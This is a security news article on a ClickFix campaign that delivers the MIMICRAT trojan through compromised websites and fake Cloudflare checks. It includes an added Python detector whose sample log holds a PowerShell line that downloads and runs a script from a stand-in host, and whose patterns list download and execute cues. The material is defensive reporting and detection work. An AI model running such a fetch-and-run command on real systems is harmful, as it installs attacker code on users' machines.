Compromised Sites Used in ClickFix Operation to Deploy MIMICRAT Trojan.

Cybersecurity researchers have published new findings on a ClickFix campaign that leverages compromised legitimate websites to distribute a previously unknown remote access trojan (RAT) named MIMICRAT (also tracked as AstarionRAT).

According to Elastic Security Labs, the operation showcases a notable degree of sophistication. Compromised sites across various industries and regions are used as the delivery network. The infection chain involves a multi‑stage PowerShell sequence that bypasses ETW and AMSI protections before deploying a Lua‑based shellcode loader. The final payload communicates over HTTPS (port 443) and uses HTTP profiles designed to imitate ordinary web analytics traffic.

Elastic describes MIMICRAT as a custom C++ RAT featuring Windows token impersonation, SOCKS5 tunneling, and 22 separate commands that enable extensive post‑exploitation activity. The campaign itself was identified earlier this month.

Researchers also noted overlaps between this operation and another ClickFix campaign reported by Huntress that ultimately leads to deployment of the Matanbuchus 3.0 loader, which then drops the same RAT. These similarities suggest the attackers may be pursuing ransomware deployment or data theft as final objectives.

The infection chain begins with bincheck[.]io, a legitimate Bank Identification Number (BIN) lookup service that was compromised. Attackers injected malicious JavaScript that loads an externally hosted PHP script. This script displays a fake Cloudflare verification page, prompting victims to copy and paste a command into the Windows Run dialog to bypass a fabricated verification issue.

That action triggers a PowerShell command that retrieves a second‑stage script from the attackers’ command‑and‑control (C2) server. This stage disables ETW logging and AMSI scanning, then drops a Lua‑scripted loader. In the final step, the Lua code decrypts and executes shellcode directly in memory, ultimately deploying MIMICRAT.
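From a detection standpoint, the distinctive moment in this chain is a PowerShell process whose parent is explorer.exe (the Run dialog's host) and whose command line reaches out for a second stage. The following added example, not code from the article or from Elastic's report, runs that check over constructed Sysmon-style process-creation records; the images, parent paths, command lines and URL are all invented samples.

```python
import json
import re

# Constructed process-creation records in a Sysmon-like JSON-lines shape.
# These are illustrative samples, not telemetry from the campaign.
SAMPLE_LOG = r"""
{"Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "ParentImage": "C:\\Windows\\explorer.exe", "CommandLine": "powershell -w hidden -c \"iwr http://stage.example.invalid/s.ps1 | iex\""}
{"Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "ParentImage": "C:\\Program Files\\Vendor\\agent.exe", "CommandLine": "powershell -File C:\\scripts\\inventory.ps1"}
{"Image": "C:\\Windows\\System32\\notepad.exe", "ParentImage": "C:\\Windows\\explorer.exe", "CommandLine": "notepad.exe notes.txt"}
{"Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "ParentImage": "C:\\Windows\\explorer.exe", "CommandLine": "powershell -NoProfile"}
"""

PS_IMAGE = re.compile(r"\\(powershell|pwsh)\.exe$", re.I)
EXPLORER_PARENT = re.compile(r"\\explorer\.exe$", re.I)
# Cues that the pasted command fetches or decodes a further stage, or hides its window.
STAGING_CUES = re.compile(
    r"(invoke-webrequest|\biwr\b|\bcurl\b|downloadstring|net\.webclient|"
    r"invoke-expression|\biex\b|-enc\w*|frombase64string|-w(indowstyle)?\s+hidden)",
    re.I,
)


def parse_events(text):
    """Parse JSON-lines records, skipping blank lines."""
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def is_run_dialog_download(ev):
    """PowerShell spawned by explorer.exe with second-stage staging cues.

    explorer.exe also parents ordinary double-clicked scripts and shortcuts,
    so the cue check is what keeps this from firing on every interactive
    PowerShell launch (see the plain '-NoProfile' sample, which is not flagged).
    """
    if not PS_IMAGE.search(ev.get("Image", "")):
        return False
    if not EXPLORER_PARENT.search(ev.get("ParentImage", "")):
        return False
    return bool(STAGING_CUES.search(ev.get("CommandLine", "")))


def flag_events(text):
    """Return the records that match the Run-dialog-to-download pattern."""
    return [ev for ev in parse_events(text) if is_run_dialog_download(ev)]


if __name__ == "__main__":
    for ev in flag_events(SAMPLE_LOG):
        print("ClickFix-like launch:", ev["CommandLine"])
```

On a real fleet, feed this the parsed process-creation events from your EDR or Sysmon pipeline; the same parent/child relationship also applies when the lure asks the victim to paste into a terminal, with the terminal host as the parent instead.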

Once active, MIMICRAT communicates over HTTPS to its C2 server and can process nearly two dozen commands to manipulate processes and the file system, open an interactive shell, perform token operations, inject shellcode, and establish SOCKS proxy tunnels.

Elastic also highlighted the campaign’s broad targeting. The lure pages support 17 different languages, dynamically adjusting to the victim’s browser language. Confirmed victims include organizations in the U.S. and multiple users from Chinese‑speaking regions, suggesting wide‑ranging, opportunistic targeting.
